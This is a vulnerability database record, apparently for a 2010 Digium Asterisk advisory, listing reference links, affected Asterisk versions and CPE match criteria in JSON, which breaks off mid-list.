cve@mitre.org	http://www.securitytracker.com/id?1023637
cve@mitre.org	http://www.vupen.com/english/advisories/2010/0439	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/56397
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2010-002.html	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/38641	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/39096
af854a3a-2127-422b-91ae-364da2661108	http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/509608/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1023637
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2010/0439	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/56397

Impacted products

Vendor	Product	Version
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.0
digium	asterisk	1.2.1
digium	asterisk	1.2.2
digium	asterisk	1.2.2
digium	asterisk	1.2.3
digium	asterisk	1.2.3
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8
digium	asterisk	1.2.9
digium	asterisk	1.2.10
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2.12
digium	asterisk	1.2.12.1
digium	asterisk	1.2.12.1
digium	asterisk	1.2.13
digium	asterisk	1.2.13
digium	asterisk	1.2.14
digium	asterisk	1.2.15
digium	asterisk	1.2.15
digium	asterisk	1.2.16
digium	asterisk	1.2.16
digium	asterisk	1.2.17
digium	asterisk	1.2.17
digium	asterisk	1.2.18
digium	asterisk	1.2.18
digium	asterisk	1.2.19
digium	asterisk	1.2.19
digium	asterisk	1.2.20
digium	asterisk	1.2.20
digium	asterisk	1.2.21
digium	asterisk	1.2.21
digium	asterisk	1.2.21.1
digium	asterisk	1.2.21.1
digium	asterisk	1.2.22
digium	asterisk	1.2.22
digium	asterisk	1.2.23
digium	asterisk	1.2.23
digium	asterisk	1.2.24
digium	asterisk	1.2.24
digium	asterisk	1.2.25
digium	asterisk	1.2.25
digium	asterisk	1.2.26
digium	asterisk	1.2.26
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.1
digium	asterisk	1.2.26.2
digium	asterisk	1.2.26.2
digium	asterisk	1.2.27
digium	asterisk	1.2.28
digium	asterisk	1.2.28.1
digium	asterisk	1.2.29
digium	asterisk	1.2.30
digium	asterisk	1.2.30.1
digium	asterisk	1.2.30.2
digium	asterisk	1.2.30.3
digium	asterisk	1.2.30.4
digium	asterisk	1.2.31
digium	asterisk	1.2.31.1
digium	asterisk	1.2.32
digium	asterisk	1.2.33
digium	asterisk	1.2.34
digium	asterisk	1.2.35
digium	asterisk	1.2.36
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.20
digium	asterisk	1.4.21
digium	asterisk	1.4.22
digium	asterisk	1.4.23
digium	asterisk	1.4.24
digium	asterisk	1.4.25
digium	asterisk	1.4.26
digium	asterisk	1.4.27
digium	asterisk	1.6.0
digium	asterisk	1.6.1
digium	asterisk	1.6.1.0
digium	asterisk	1.6.2.0
digium	asterisk	b.1.3.2
digium	asterisk	b.1.3.3
digium	asterisk	b.2.2.0
digium	asterisk	b.2.2.1
digium	asterisk	b.2.3.1
digium	asterisk	b.2.3.2
digium	asterisk	b.2.3.3
digium	asterisk	b.2.3.4
digium	asterisk	b.2.3.5
digium	asterisk	b.2.3.6
digium	asterisk	b.2.5.0
digium	asterisk	b.2.5.1
digium	asterisk	b.2.5.2
digium	asterisk	b.2.5.3
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.6
digium	asterisk	c.1.6.1
digium	asterisk	c.1.6.2
digium	asterisk	c.1.8.0
digium	asterisk	c.1.8.1
digium	asterisk	c.2.3
digium	asterisk	c.3.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "39358795-09A6-44C6-B969-1560CEF40057",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "8C2DAB51-91ED-43D4-AEA9-7C4661089BAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A596A018-2FBC-4CEB-9910-756CC6598679",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14BDCF8E-0B68-430A-A463-EE40C1A9AD65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CA2CD93E-71A5-49EC-B986-5868C05553EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B66B213-4397-4435-8E48-8ED69AAE13D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "55131A3D-C892-44EC-83D6-5888C57B11A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E017DD53-B8EC-4EA2-BF59-18C075C5771D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "B940EEC6-4451-42B9-A56D-BDB8801B3685",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.3:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "CE4AB19F-1338-466D-AAD8-584C79FED1AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F06C361-D7DF-474B-A835-BA8886C11A80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "FF5A2AA3-BB1F-4DEA-A369-183877BBDAC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "7B43C508-91E3-49C9-86F0-3643D8F2B7F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0831E658-36AB-4A4B-9929-3DB6BE855A3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "69417F54-D92F-46FB-9BFA-995211279C0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "46A770C7-A7D4-44E3-A8B4-AC2189EAC3DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "4611BEA0-25EC-4705-A390-6DF678373FF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "4BCD1F97-4B56-4DA8-A6EC-FA42A3CB9B97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "53022458-F443-4402-AC52-FC3AE810E89E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "120B85AA-E9B8-4A4D-81CE-FD36CDB63074",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "64D94742-7CA1-487B-90E8-5063FBF88925",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "12302460-5D3F-4045-9DBF-606562E03BDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.16:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "78546FDF-C843-4E48-ABEE-CC3514AA7C3A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D6EBC0B-9842-44D1-B9D6-EFB88BE22879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.17:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "052969F1-6758-46E8-9273-E0F872BD65BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "624A0F00-4629-4550-847F-F24CC93DFF2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.18:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "E473F645-F8B0-43FE-957B-F053427465DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "10FC9AAB-1FAD-4953-A2FC-D42E9687D27E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.19:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "460C9907-AA19-402A-85DE-D3CEA98B107B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD80F0D6-6B5B-41D3-AC41-F1643865088A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.20:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "734D5198-53C1-40D3-B5BF-D74FC71FD3BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "788DEF5E-8A99-463D-89DC-0CC032271554",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "C0996D7A-9419-4897-A0AF-498AC3A2A81F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "62D670E6-47E5-4B40-9217-F97D5F39C3EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.21.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "94C23DB8-3C92-40FE-B8A6-ADF84D28510E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6CE7E4E-DA2D-4F03-A226-92965B40AE34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.22:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "0C59A947-457E-47EB-832E-3DA70CB52695",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "55F74B56-B412-4AF1-AED0-C948AB6DC829",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.23:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "3B50ADDB-D3C2-407D-8844-F93866E5F20C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "2775A7CC-2D88-4F2D-8C26-1E0DDDD681E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "F4149B59-E773-4ED8-A71D-EB7D00808819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A0408C3-0FA7-4A17-9451-C4D46CDA8F27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1726090D-0C37-44A4-AD9B-7ED733B8702D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "B92B045B-8CD6-4C04-9CCB-DCE9A44F6C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "54354E16-3238-43E8-BAA9-93CA7EB44D4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6867EED4-FC3B-4B72-88A5-DED96C729FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1A0867FC-7161-433F-A416-D7207C8D4D36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "97BE6B60-3276-4580-843B-743D0D71E3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "36491B32-A405-4C5B-938F-9BEA50A8AF16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "6141909B-EBC4-4726-AE9F-669C31257A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "754A51AC-EF20-4736-ADDB-D2A70BCB79EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4600BB66-6DEB-444B-AF9E-BDD06CFD2876",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE089E31-3521-4D12-B81C-B6E386AE1409",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "FFE86E95-1110-46DF-9A7A-0E1AA56ACE4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B6DF5C5-85B4-4595-A69B-1DE70B5E0E41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F5E9888-16CD-4DB2-8889-CE4477559C71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "C29C9A2C-6435-444E-A20B-5881F3798B85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "E77A2569-CFAE-498D-A633-803849CFECE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "D16E88E6-42D0-400E-AF43-111B35CE11E8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE15A42E-030B-48F0-9498-1755DAAEDFB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "39511726-1202-4179-9708-4D3B28496768",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2A9A4328-F274-4591-A386-943FD6608374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B4A8C9A-A475-4F02-A6BC-F17CEECBF0AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF11B38A-12D7-453A-870D-CDC2DE9313CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D69ACB7-CF9A-40B5-819E-58DA884D4E1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "FE9D66C4-F49D-4EC4-B5A9-24F28726A9B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "BEFA5054-D5F9-4D07-9A66-D7AAD6953F5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "D110DCEB-F2F9-4600-B49F-22952C71B785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3333A119-D92F-433C-BF5D-0037199256C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "19C44C33-EADA-48FD-A634-8066A003AFD0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "294A2BA2-26EB-40AD-B861-7FA9043CD097",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "4FAC61AF-BDF2-4397-A8F8-9D9155836E4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "33DE61C2-8C6A-4CD3-8D56-E70C4356CD50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.5:-:business:*:*:*:*:*",
              "matchCriteriaId": "EECB5F75-BCE2-4777-933E-25EB5657750C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "B5D51557-3E67-4C9A-9753-472D13FCA5C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "C063FCFA-B1C3-4ACB-B9E7-B3FC973FD898",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "761DB3A3-1540-4976-AEB2-F8E45CCCC5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "B53CD2C1-9BF0-42F9-B3E3-2C9915E531C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "947F58B8-21AF-460B-8203-D2605A1F91D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta7:business:*:*:*:*:*",
              "matchCriteriaId": "1C4E15BB-71AB-4936-9CA7-E844572A3953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta8:business:*:*:*:*:*",
              "matchCriteriaId": "EE5823E1-5BFF-44E0-B8DD-4D994073DC1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "E6C147EF-0C39-4979-A4F6-C0BE288F083F",
              "vulnerable": true
            },
            {
